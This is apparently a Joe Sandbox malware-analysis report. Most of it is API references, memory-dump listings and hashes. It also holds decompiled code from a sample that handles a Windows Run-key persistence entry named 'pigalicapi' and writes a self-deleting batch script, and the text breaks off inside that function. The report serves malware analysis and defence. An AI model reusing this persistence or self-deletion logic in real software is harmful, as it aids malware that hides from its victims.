                                                                                                                                                                                                                                                                                                        • Instruction ID: c64b90f60543cdd9f1b152a56a7e8b33ad9649d5cc2119a14d9a029aa2c63625
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7b5e2a0a0879127798f9ea868be388b8c75a87b6f8ac87fe0ac4160dfdf198bf
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D0510D75E00209AFEB18DF94C895FAEB7B5FB48305F10C558E615BB280D778A981CB64
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetSystemTimeAsFileTime.KERNEL32 ref: 0040D488
                                                                                                                                                                                                                                                                                                        • GetCurrentProcessId.KERNEL32 ref: 0040D499
                                                                                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 0040D4A1
                                                                                                                                                                                                                                                                                                        • GetTickCount.KERNEL32 ref: 0040D4AA
                                                                                                                                                                                                                                                                                                        • QueryPerformanceCounter.KERNEL32 ref: 0040D4B9
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.630613479.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.630299651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.630481096.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631291929.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631468354.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631586633.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631856136.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631956687.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.632480755.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_6gjnnBAbpc.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 1445889803-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: d5a97a9b8559dd39cafb010e2e76c8d29c3b64d6af4c216edf4aba10e025f6e2
                                                                                                                                                                                                                                                                                                        • Instruction ID: f7418f5e27814e582490d40679fb3d8e681102d975b17fa56a29dd6ac314bc8c
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d5a97a9b8559dd39cafb010e2e76c8d29c3b64d6af4c216edf4aba10e025f6e2
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1711B27AD002188BCB109FB9E9885DEFBB4FB4C364F854536D805B7210DB3569198B99
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32 ref: 0040D54F
                                                                                                                                                                                                                                                                                                        • UnhandledExceptionFilter.KERNEL32 ref: 0040D55F
                                                                                                                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 0040D568
                                                                                                                                                                                                                                                                                                        • TerminateProcess.KERNEL32 ref: 0040D579
                                                                                                                                                                                                                                                                                                        • abort.MSVCRT ref: 0040D582
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.630613479.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.630299651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.630481096.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631291929.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631468354.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631586633.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631856136.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631956687.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.632480755.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_6gjnnBAbpc.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: ExceptionFilterProcessUnhandled$CurrentTerminateabort
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 520269711-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: fd9db7f0874483d10b200add315514f979aa86a3b60fb29af93f5c95035f5732
                                                                                                                                                                                                                                                                                                        • Instruction ID: 9824e27efd6e7c83b31d16d0cbecc9548462bee31ea0de24143adee51b232729
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fd9db7f0874483d10b200add315514f979aa86a3b60fb29af93f5c95035f5732
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8901ACB4A04304DFD710EF79EA495597BF0FB04304F818939ED9997220E7B45556CF8A
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32 ref: 0040D54F
                                                                                                                                                                                                                                                                                                        • UnhandledExceptionFilter.KERNEL32 ref: 0040D55F
                                                                                                                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 0040D568
                                                                                                                                                                                                                                                                                                        • TerminateProcess.KERNEL32 ref: 0040D579
                                                                                                                                                                                                                                                                                                        • abort.MSVCRT ref: 0040D582
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.630613479.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.630299651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.630481096.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631291929.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631468354.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631586633.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631856136.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631956687.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.632480755.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_6gjnnBAbpc.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: ExceptionFilterProcessUnhandled$CurrentTerminateabort
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 520269711-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: dc419f05c78df07fc1028f6fa8ebfa857d173d53209bdf56c34a1317ca656444
                                                                                                                                                                                                                                                                                                        • Instruction ID: 01619bb876d6b6a6ce0892675db8caf066cd75de0a22c9d772086659f3caa19f
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: dc419f05c78df07fc1028f6fa8ebfa857d173d53209bdf56c34a1317ca656444
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F701A8B4A04304DFD710EF7AEA495597BF0FB04304F818A39ED8997220E7B85556CF8A
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                                        			E00401E50(signed int __eax) {
                                                                                                                                                                                                                                                                                                        				intOrPtr _v20;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v24;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v32;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v36;
                                                                                                                                                                                                                                                                                                        				signed int _t10;
                                                                                                                                                                                                                                                                                                        				intOrPtr* _t15;
                                                                                                                                                                                                                                                                                                        				intOrPtr* _t16;
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				_v20 = 0;
                                                                                                                                                                                                                                                                                                        				_v24 = 0;
                                                                                                                                                                                                                                                                                                        				 *_t15 = 0;
                                                                                                                                                                                                                                                                                                        				L00404F5C();
                                                                                                                                                                                                                                                                                                        				_t16 = _t15 - 0xc;
                                                                                                                                                                                                                                                                                                        				_t10 = __eax & 0xffffff00 | __eax == 0x00000000;
                                                                                                                                                                                                                                                                                                        				if(_t10 == 0) {
                                                                                                                                                                                                                                                                                                        					_v32 = 0;
                                                                                                                                                                                                                                                                                                        					_v36 = 0;
                                                                                                                                                                                                                                                                                                        					 *_t16 = 0;
                                                                                                                                                                                                                                                                                                        					L00404F5C();
                                                                                                                                                                                                                                                                                                        					if((_t10 & 0xffffff00 | _t10 == 0x00000000) == 0) {
                                                                                                                                                                                                                                                                                                        						return 0;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					return 1;
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				return 1;
                                                                                                                                                                                                                                                                                                        			}










                                                                                                                                                                                                                                                                                                        0x00401e56
                                                                                                                                                                                                                                                                                                        0x00401e5e
                                                                                                                                                                                                                                                                                                        0x00401e66
                                                                                                                                                                                                                                                                                                        0x00401e6d
                                                                                                                                                                                                                                                                                                        0x00401e72
                                                                                                                                                                                                                                                                                                        0x00401e77
                                                                                                                                                                                                                                                                                                        0x00401e7c
                                                                                                                                                                                                                                                                                                        0x00401e85
                                                                                                                                                                                                                                                                                                        0x00401e8d
                                                                                                                                                                                                                                                                                                        0x00401e95
                                                                                                                                                                                                                                                                                                        0x00401e9c
                                                                                                                                                                                                                                                                                                        0x00401eab
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00401eb4
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00401ead
                                                                                                                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • ZwOpenSymbolicLinkObject.NTDLL ref: 00401E6D
                                                                                                                                                                                                                                                                                                        • ZwOpenSymbolicLinkObject.NTDLL ref: 00401E9C
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.630481096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.630299651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.630613479.0000000000402000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631291929.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631468354.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631586633.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631856136.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631956687.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.632480755.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_6gjnnBAbpc.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: LinkObjectOpenSymbolic
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3706036087-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 1ce86b054a603b6eaab08c5c754c87037e059b9d76325e10417d63c02768b84f
                                                                                                                                                                                                                                                                                                        • Instruction ID: dc50c365ff92ddb02f3a77bb4394c433765aadc07f1f97dea54c6a81e4aa1f8d
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1ce86b054a603b6eaab08c5c754c87037e059b9d76325e10417d63c02768b84f
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 89F0EDB010930196E7007F75D24535B7AE49B80348F00453EEE89AB3D6DBBDC84987CB
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.649432754.0000000000E60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E60000, based on PE: false
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_e60000_6gjnnBAbpc.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                        • Opcode ID: fda46960d40e5069d9d85ddddae04929f816436dd0746330b63fa234edf94fde
                                                                                                                                                                                                                                                                                                        • Instruction ID: f00d5530f6cb6e510e01d7bd9319965ab0a8cc3d807ab60b69815b871e6b19b8
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fda46960d40e5069d9d85ddddae04929f816436dd0746330b63fa234edf94fde
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FF31BF75A087268FDB50DF58D8C0D26B7E4FF89394B0514A9E8809B312E730EC05CBD1
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.630613479.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.630299651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.630481096.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631291929.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631468354.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631586633.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631856136.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631956687.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.632480755.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_6gjnnBAbpc.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                        • Opcode ID: d68cdb25bd860636420cb464b12059b347e46f809f98f5638d4cc3509d77f857
                                                                                                                                                                                                                                                                                                        • Instruction ID: e0c1f48c15c03355e32f8fb246acf246ea8422a10dedd0577e515afab30cd0ef
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d68cdb25bd860636420cb464b12059b347e46f809f98f5638d4cc3509d77f857
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 54C08C70C093008BC2007F38A506028BEF26F12308FC428EEE84413222E739845846AF
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        C-Code - Quality: 37%
                                                                                                                                                                                                                                                                                                        			E04003090() {
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				asm("lodsd");
                                                                                                                                                                                                                                                                                                        				return  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 8));
                                                                                                                                                                                                                                                                                                        			}



                                                                                                                                                                                                                                                                                                        0x0400309f
                                                                                                                                                                                                                                                                                                        0x040030a4

                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.659687916.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.659598830.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.660025736.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.660136612.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4000000_6gjnnBAbpc.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                        • Opcode ID: 0762464406f5326cc4d875fd4cc4a5037c8c5ab54130ac6080e8745e463cdf5e
                                                                                                                                                                                                                                                                                                        • Instruction ID: 88215b3929851b503fb9e0336a359976704c6dde636ba1c8479b7b66991880c0
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0762464406f5326cc4d875fd4cc4a5037c8c5ab54130ac6080e8745e463cdf5e
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 25C04C36221850CFC781CF18E444E81B3E4FB09631B068491E805DB721D234EC41CA40
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.630613479.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.630299651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.630481096.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631291929.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631468354.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631586633.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631856136.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631956687.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.632480755.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_6gjnnBAbpc.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                        • Opcode ID: 8568df9e904910b9f40311fdc360b2d4446594f8793b8f3ffa94d4c3a8a20687
                                                                                                                                                                                                                                                                                                        • Instruction ID: c44a3771f1df941e5b7939865c0dfe98d38faecbb3f8320e7e088cb6d49b5c59
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8568df9e904910b9f40311fdc360b2d4446594f8793b8f3ffa94d4c3a8a20687
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.630613479.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.630299651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.630481096.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631291929.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631468354.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631586633.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631856136.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631956687.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.632480755.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_6gjnnBAbpc.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                        • Opcode ID: 8568df9e904910b9f40311fdc360b2d4446594f8793b8f3ffa94d4c3a8a20687
                                                                                                                                                                                                                                                                                                        • Instruction ID: c44a3771f1df941e5b7939865c0dfe98d38faecbb3f8320e7e088cb6d49b5c59
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8568df9e904910b9f40311fdc360b2d4446594f8793b8f3ffa94d4c3a8a20687
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        C-Code - Quality: 95%
                                                                                                                                                                                                                                                                                                        			E040074A0() {
                                                                                                                                                                                                                                                                                                        				char _v524;
                                                                                                                                                                                                                                                                                                        				CHAR* _v528;
                                                                                                                                                                                                                                                                                                        				void* _v532;
                                                                                                                                                                                                                                                                                                        				void* _v536;
                                                                                                                                                                                                                                                                                                        				void* _v540;
                                                                                                                                                                                                                                                                                                        				char _v1060;
                                                                                                                                                                                                                                                                                                        				char _v1580;
                                                                                                                                                                                                                                                                                                        				char _v2364;
                                                                                                                                                                                                                                                                                                        				long _v2368;
                                                                                                                                                                                                                                                                                                        				struct _PROCESS_INFORMATION _v2384;
                                                                                                                                                                                                                                                                                                        				long _v2388;
                                                                                                                                                                                                                                                                                                        				struct _STARTUPINFOA _v2460;
                                                                                                                                                                                                                                                                                                        				void* _t86;
                                                                                                                                                                                                                                                                                                        				void* _t121;
                                                                                                                                                                                                                                                                                                        				void* _t123;
                                                                                                                                                                                                                                                                                                        				void* _t124;
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				E04007D20(E04007D20( &_v2364,  &_v2364, 0, 0x30c),  &_v1060, 0, 0x208);
                                                                                                                                                                                                                                                                                                        				_t123 = _t121 + 0x18;
                                                                                                                                                                                                                                                                                                        				 *0x4014370 = 1;
                                                                                                                                                                                                                                                                                                        				Sleep(0x3e8);
                                                                                                                                                                                                                                                                                                        				if(( *0x4014362 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                                                        					_v2368 = 0x207;
                                                                                                                                                                                                                                                                                                        					if(( *0x401435a & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                                                        						GetEnvironmentVariableA("USERPROFILE",  &_v1060, 0x207);
                                                                                                                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                                                                                                                        						__imp__GetAllUsersProfileDirectoryA( &_v1060,  &_v2368);
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					lstrcatA( &_v1060, "\\");
                                                                                                                                                                                                                                                                                                        					lstrcatA( &_v1060, "pigalicapi");
                                                                                                                                                                                                                                                                                                        					lstrcatA( &_v1060, ".exe");
                                                                                                                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                                                                                                                        					GetModuleFileNameA(0,  &_v1060, 0x207);
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				SetFileAttributesA( &_v1060, 0x80);
                                                                                                                                                                                                                                                                                                        				wnsprintfA( &_v2364, 0x30b, ":repeat\r\ndel %s\r\nif exist %s goto :repeat\r\ndel %%0",  &_v1060,  &_v1060);
                                                                                                                                                                                                                                                                                                        				_t124 = _t123 + 0x14;
                                                                                                                                                                                                                                                                                                        				if( *0x401436c != 0) {
                                                                                                                                                                                                                                                                                                        					_t86 =  *0x401436c; // 0x2dc
                                                                                                                                                                                                                                                                                                        					TerminateThread(_t86, 1);
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				_v528 = "software\\microsoft\\windows\\currentversion\\run";
                                                                                                                                                                                                                                                                                                        				_v532 = 0x80000001;
                                                                                                                                                                                                                                                                                                        				if(( *0x401435a & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                                                        					_v532 = 0x80000002;
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				_v536 = 0;
                                                                                                                                                                                                                                                                                                        				if(RegOpenKeyExA(_v532, _v528, 0, 2,  &_v536) == 0) {
                                                                                                                                                                                                                                                                                                        					RegDeleteValueA(_v536, "pigalicapi");
                                                                                                                                                                                                                                                                                                        					RegCloseKey(_v536);
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				if(( *0x401435b & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                                                        					E04005E30(1);
                                                                                                                                                                                                                                                                                                        					_t124 = _t124 + 4;
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				GetEnvironmentVariableA("TEMP",  &_v1580, 0x104);
                                                                                                                                                                                                                                                                                                        				GetTempFileNameA( &_v1580, "slf", GetTickCount() % 0xffff,  &_v524);
                                                                                                                                                                                                                                                                                                        				lstrcatA( &_v524, ".bat");
                                                                                                                                                                                                                                                                                                        				_t71 = CreateFileA( &_v524, 0x40000000, 1, 0, 2, 0, 0);
                                                                                                                                                                                                                                                                                                        				_v540 = _t71;
